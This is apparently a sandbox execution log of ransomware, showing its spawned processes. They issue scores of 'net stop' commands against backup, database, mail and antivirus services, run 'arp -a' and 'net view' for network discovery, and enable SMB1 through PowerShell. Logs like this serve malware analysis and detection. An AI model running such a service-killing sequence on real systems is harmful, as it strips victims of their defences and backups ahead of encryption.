C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:2088
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:2704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:3052
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:3016
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:2756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:1372
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:2972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:2864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:320
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:2832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:1976
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:2808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:1676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵PID:2792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:3044
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:2784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:1612
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:2776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2140
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵PID:2768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:2052
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:2116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2068
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:2136
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:1540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:2220
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:2340
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:2304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵PID:2352
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:2312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵PID:2196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵PID:1124
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵PID:2216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:2508
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:2396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:2360
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:2600
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵PID:2440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:2936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:2384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2648
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:2392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2400
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:2524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵PID:2976
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:2476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:2796
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:2884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:2864
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:2820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵PID:2656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵PID:2740
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:2428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵PID:2924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2356
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:2532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:2380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:2424
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:2460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2948
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:2488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:2828
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:2604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2892
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:3060
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:2964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:2988
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵PID:2944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:2768
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵PID:2888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:1884
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵PID:2100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:2300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵PID:2072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:2264
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:1612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:2528
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵PID:2208
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:2180
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵PID:1984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:2268
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:2144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:2348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:2472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵PID:2152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:2544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:2512
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:1964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:2708
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:2616
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:2132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵PID:2308
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:2376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵PID:2292
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:1388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:320
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵PID:2092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:2584
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:2836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:2520
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:2832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:2568
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:2868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:3004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵PID:2448
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵PID:1624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:2432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:2176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:2920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:2128
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵PID:2824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:2740
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:2980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵PID:2424
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:2904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:2996
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:2808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2296
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:2784
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵PID:2972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:2416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:2696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:3032
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:2764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵PID:2916
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:2960
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:1156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:2316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵PID:3044
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:1512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:2704
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:2260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵PID:2468
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:2016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:2856
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵PID:1368
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵PID:2984
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:2220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:2540
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:2564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:108
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:2596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:3164
-
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:2356
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:3008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:3332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:2140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵PID:3324
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:2360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:3300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:2912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵PID:3420
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:2728
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵PID:3348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:2060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵PID:3524
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:2860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵PID:3412
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵PID:2708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:3340
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:1520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:3316
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵PID:2300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵PID:3548
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:2244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:3460
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view2⤵PID:400
-
C:\Windows\SysWOW64\net.exenet view3⤵
- Discovers systems in the same network
PID:2164
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:3388
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵PID:924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:3396
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:2264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵PID:3572
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:2492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:3636
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵PID:2844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:3620
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:3668
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵PID:3652
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:2204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵PID:1896
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:2660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵PID:3416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:1964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵PID:1784
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵PID:2476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:3688
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:2720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵PID:3676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:2420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵PID:3660
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵PID:820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:3644
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵PID:2804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:2244
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:2560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵PID:3392
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵PID:3460
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵PID:6116
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵PID:2232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:3344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:1984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:3332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵PID:2396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:2144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:2484
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵PID:1388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:1620
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:1540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:3548
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵PID:2868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:2656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵PID:5776
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵PID:2940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:3316
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:2820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵PID:2068
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵PID:2696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:3420
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:2364
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:2692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:4868
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:2808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:2348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:2864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:5992
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:2772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:2468
-
-
-
